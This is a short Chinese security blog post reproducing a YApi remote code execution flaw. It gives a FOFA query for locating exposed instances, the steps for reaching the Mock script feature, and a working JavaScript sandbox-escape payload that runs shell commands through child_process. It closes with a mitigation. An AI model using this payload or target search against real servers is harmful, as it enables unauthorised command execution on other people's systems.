跟风一波复现Yapi

漏洞描述：

YApi接口管理平台远程代码执行0day漏洞，攻击者可通过平台注册用户添加接口，设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态，强烈建议客户尽快采取缓解措施以避免受此漏洞影响

fofa：

Fofa:app="YApi"

漏洞复现：

默认注册功能开启。
注册后创建项目：
添加接口：
创建接口成功：

选择“高级Mock”，“脚本”，开启脚本：

写入poc并保存：

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

预览：
效果：
Yapi作者已经停止更新。临时修复建议禁止用户注册，具体配置参考原文链接：
https://github.com/YMFE/yapi/issues/2099

看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!